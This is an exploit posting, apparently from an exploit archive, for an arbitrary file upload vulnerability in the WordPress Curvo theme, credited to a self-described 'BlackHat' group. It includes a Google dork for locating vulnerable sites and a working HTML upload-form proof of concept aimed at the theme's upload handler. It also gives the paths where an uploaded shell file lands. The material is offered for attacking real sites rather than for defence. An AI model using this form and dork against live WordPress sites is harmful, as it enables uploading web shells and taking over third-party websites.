Home / exploits WordPress Curvo Shell Upload
Posted on 30 October 2013
################################################################################################### #_________ .___ _______ ___. .__ #\_ ___ ____ __| _/____ ______ _ _\_ |__ |__| ____ #/ / / _ / __ |/ __ / | \_/ __ / / /| __ | |/ __ # \___( <_> ) /_/ ___/ / | ___/ / | \_ ___/ # \______ /\____/\____ |\___ > \____|__ /\___ >/\_/ |___ /__|\___ > # / / / / / / / ################################################################################################### # Exploit Title: WordPress Curvo Themes Arbitrary File Upload Vulnerability # Author: Byakuya # Date: 10/28/2013 # Vendor Homepage: http://themeforest.net/ # Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/ # Price: $35 # Affected Version: Unknown # Infected File: upload_handler.php # Category: webapps/php # Google dork: inurl:/wp-content/themes/curvo/ ################################################################################################### # Exploit & POC : <form enctype="multipart/form-data" action="http://127.0.0.1/wordpress/wp-content/themes/curvo/functions/upload-handler.php" method="post"> <input type="jpg" name="url" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> #File path: http://site.com/wordpress/wp-content/uploads/[FILE] or http://site.com/wordpress/wp-content/uploads/[year]/[month]/[FILE] #Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie #Facebook: https://www.facebook.com/CodeNewbieCrew #Website: http://www.codenewbie.net #Malaysia & Indonesia BlackHat ###################################################################################################
